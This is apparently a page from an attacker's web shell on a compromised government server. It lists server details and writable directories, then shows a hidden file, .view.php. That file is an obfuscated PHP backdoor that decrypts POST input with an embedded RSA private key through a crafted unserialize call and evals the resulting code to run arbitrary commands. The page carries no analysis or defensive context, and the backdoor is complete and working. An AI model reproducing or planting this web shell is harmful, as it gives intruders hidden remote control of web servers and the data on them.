MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/files/.view.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
//echo strrev('openssl_private_decrypt');//tpyrced_etresuavirp_lssnepo

class A{
    public $test = "demo";
    function __wakeup(){
        function decode($test){
            $pk = <<<EOF
-----BEGIN PRIVATE KEY-----
MIIBUwIBADANBgkqhkiG9w0BAQEFAASCAT0wggE5AgEAAkEAqTTcwoVEdY5W/Gho
/ebYYw+QYWZWqo3XjVfgr1Vu/ST80U4coYCEOyUZYHofzbGVMJlchJ39ol8XX5m0
C+D1OwIDAQABAkALHBRulS90hH8DnZtfKFwGzQvOyVhhZGTFvAJdoL9j0YGC8zIn
X/NnrxtZ9WHA+lnaZRDZagutV600R1Kj2hoJAiEA3OVn05Wz2PmlanOxeDX1+Wcz
XLF2TuW0a0ORVLdF+H8CIQDEGJizJfho4gp6r5S76wRwQK/+mzzMGoa0reENVpWF
RQIgHwCbd9i06yjujGg8ajC4mw5e6Q2HGz+l+L/877ThPyUCIA6PTPcwQIt5DRIi
60Ywovm6s9aRrCfzaEEOEAGvhhaJAiAFElQy+P4SBsrus0GcVCFlTTocFgSgWz19
pFP6NzRbqw==
-----END PRIVATE KEY-----
EOF;
            $cmds = explode("|", $test);
            $pk = openssl_pkey_get_private($pk);
            $cmd = '';
            foreach ($cmds as $value) {
                $ard = "xxaaa";
                $$ard = strrev("tpyrced_etresuavirp_lssnepo");
                $ard1 =str_ireplace("user","",$xxaaa);
//                echo $ard1;
                $a = substr_replace("xxser","base64_decod",2);
                $b = array('',$a);
                $c = $b[1].chr(/**!*//**!*//**!*//**!*/'101'/**!*//**!*//**!*//**!*/);
                $fun=str_ireplace(/**!*//**!*//**!*//**!*/"xx","",$c/**!*//**!*//**!*//**!*/);
                $d = substr_replace("",$fun,0);
                $ard1($d(/**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*//**!*/$value), $de, $pk);
                $cmd .= $de;}
            return $cmd;
        }

        $resultname='payload';
        if (isset($this->test)){
            $data=decode($this->test);
//            $results = $_SESSION[$resultname];
            $sess = "~vhvv*gg"^"!%-%%c()";
//            echo $sess;
            $result1 = $_SESSION[$resultname];
            if (isset($result1)){
                $a = substr_replace("xxser","base64_decod",2);
                $b = array('',$a);
                $c = $b[1].chr(/**!*//**!*//**!*//**!*/'101'/**!*//**!*//**!*//**!*/);
                $fun=str_ireplace(/**!*//**!*//**!*//**!*/"xx","",$c/**!*//**!*//**!*//**!*/);
                $d = substr_replace("",$fun,0);
                $b64 = base64_encode($result1);
                $str1 = str_rot13($b64);
                $str2 = str_rot13($str1);
//                $bb = base64_decode('YmFzZTY0X2RlY29kZQ');
                eval(base64_decode(/**!*//**!*//**!*//**!*/$str2/**!*//**!*//**!*//**!*/)/**!*//**!*//**!*//**!*/);

                echo @run($data);

            }else{
                $_SESSION[$resultname]=$data;
            }
        }
    }
}
$pass=$_POST["rauPostData"];
$len = strlen($pass)+1;
//echo $len;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$pass.";\";}";
unserialize($pp);

Anon7 - 2021